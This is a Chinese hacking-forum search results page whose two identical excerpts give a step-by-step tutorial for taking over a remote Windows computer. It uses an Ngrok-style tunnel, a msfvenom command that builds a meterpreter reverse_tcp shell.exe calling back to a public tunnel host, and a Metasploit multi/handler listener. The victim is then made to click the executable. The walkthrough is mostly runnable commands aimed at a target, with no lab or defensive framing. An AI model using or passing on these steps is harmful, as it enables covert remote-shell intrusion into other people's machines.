跳转到帖子

搜索论坛

显示结果为标签'java'、'系统'、'数据库'、'源码'或'管理系统'。

  • 用标签来搜索

    用逗号分隔标签类型
  • 用作者来搜索

内容类型


论坛

  • 漏洞与黑客攻击防御安全领域
    • 黑客攻防业务合作
    • 世界黑客新闻动态
    • WEB和服务器安全漏洞
    • CHT漏洞数据库
    • Linux Kali高级学习教程
    • CTF&密码学与社会工程
    • 木马病毒分析
    • 黑客世界会员中心
  • 问题讨论中心
    • 问答中心
    • 交流中心
  • 编程开发
    • 各种编程技术
    • ios /安卓开发
  • CHT官方团队介绍及比赛制度
    • CTF攻防系统[供会员使用]
    • 积分商场
    • 积分跳马系统
    • 积分统计系统

产品组

  • Hacker attack and defense security hardware series
  • Internet Security Book Recommendations

博客

没有结果。

没有结果。

类别

  • Hacker Attack and Defense & Network Security Videos

查找结果在…

查找包含的结果…


创建日期

  • 开始

    结束


最后更新

  • 开始

    结束


按数量过滤…

注册日期

  • 开始

    结束


用户组


About Me

找到2个结果

  1. 简介: Kali Linux的前身是BackTrack Linux发行版。Kali Linux是一个基于Debian的Linux发行版,它被认为是最好的渗透测试的 Linux 发行版之一,而且名副其实。 Kali常用配置和基本使用: Kali工具集介绍 修改Kali源和更新软件 Kali伪装成win10 Kali启动root用户 1.外网步骤思想图 Ngrok穿透成公网Ip---> Kali LinuxIP穿透出去-----> 生成Shell.exe ----->监听当前Ip是否点击---->目标电脑发送exe---->点击shell.exe 1、进入Ngrok网站注册一个用户() 2.下载Kali LInux版本 1.根据攻击机系统情况下载客户端版本(这里下载Linux 64bita版本) 2. 拖入虚拟器托不进去看上一个教程 解压zip 3.进入解压好的目录: 报错Tcp就重新去Ngrok重新换一个隧道免费很多人用 ./sunny clientid id =>隧道id 启动了当前窗口不要关闭 3、MSF生成外网MM 不加Tcp不然报错 msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com:10161 lport=10306 -f exe -o /home/shell.exe 4、打开msf设置payload,加载攻击模块设置本地IP和监听端口 msfconsole 开启 5.绑定当前端口Ip use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 当前Ip Kali set LPORT 4444 show options (查看IP端口设置情况) run (开启监听) 6.等待对方点击shell.exeMM 成功就有meterpreter命令行 执行命令即可 总结: 就是我们穿透去公网并且公网穿透连接本地Ip---->监听本地IP ---->目标点击.exe--->
  2. 简介: Kali Linux的前身是BackTrack Linux发行版。Kali Linux是一个基于Debian的Linux发行版,它被认为是最好的渗透测试的 Linux 发行版之一,而且名副其实。 Kali常用配置和基本使用: Kali工具集介绍 修改Kali源和更新软件 Kali伪装成win10 Kali启动root用户 1.外网步骤思想图 Ngrok穿透成公网Ip---> Kali LinuxIP穿透出去-----> 生成Shell.exe ----->监听当前Ip是否点击---->目标电脑发送exe---->点击shell.exe 1、进入Ngrok网站注册一个用户() 2.下载Kali LInux版本 1.根据攻击机系统情况下载客户端版本(这里下载Linux 64bita版本) 2. 拖入虚拟器托不进去看上一个教程 解压zip 3.进入解压好的目录: 报错Tcp就重新去Ngrok重新换一个隧道免费很多人用 ./sunny clientid id =>隧道id 启动了当前窗口不要关闭 3、MSF生成外网MM 不加Tcp不然报错 msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com:10161 lport=10306 -f exe -o /home/shell.exe 4、打开msf设置payload,加载攻击模块设置本地IP和监听端口 msfconsole 开启 5.绑定当前端口Ip use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 当前Ip Kali set LPORT 4444 show options (查看IP端口设置情况) run (开启监听) 6.等待对方点击shell.exeMM 成功就有meterpreter命令行 执行命令即可 总结: 就是我们穿透去公网并且公网穿透连接本地Ip---->监听本地IP ---->目标点击.exe--->

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    ×
    ×
    • 创建新的...